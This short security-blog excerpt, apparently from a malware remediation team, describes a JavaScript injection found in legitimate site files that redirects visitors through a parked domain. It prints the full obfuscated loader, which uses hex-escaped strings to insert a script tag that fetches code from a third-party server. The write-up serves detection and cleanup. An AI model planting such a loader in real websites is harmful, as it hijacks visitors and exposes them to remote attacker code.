Malicious Injection Redirects Traffic via Parked Domain

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website’s traffic, redirecting visitors via a parked third-party domain to generate ad revenue.

Investigating obfuscated JavaScript

Our investigation revealed the following piece of obfuscated JavaScript which was found injected into random legitimate JavaScript files in the environment.

In most cases, the injection typically looks something like this:

var div_avada=document.createElement(‘script’);div_avada.setAttribute(“type”,”text/javascript”);var all_avada=[“x2Fx2Fx68x74x6Dx6Cx35x2Ex6Fx6Ex6Cx2Fx6Ex61x76x2Ex70x68x70x3F”,”x72x61x6Ex64x6Fx6D”];var b_avada=all_avada[0]+Math[all_avada[1]]();div_avada.setAttribute(“src”,b_avada);if (typeof div_avada!=”undefined”);document.getElementsByTagName(“head”)[0].appendChild(div_avada);

While the variable names used for the injection will vary from site to site, the end result is the same: the injection loads a script from a third-party server, which can pose significant security risks to website traffic when controlled by one or more bad actors.

Continue reading Malicious Injection Redirects Traffic via Parked Domain at .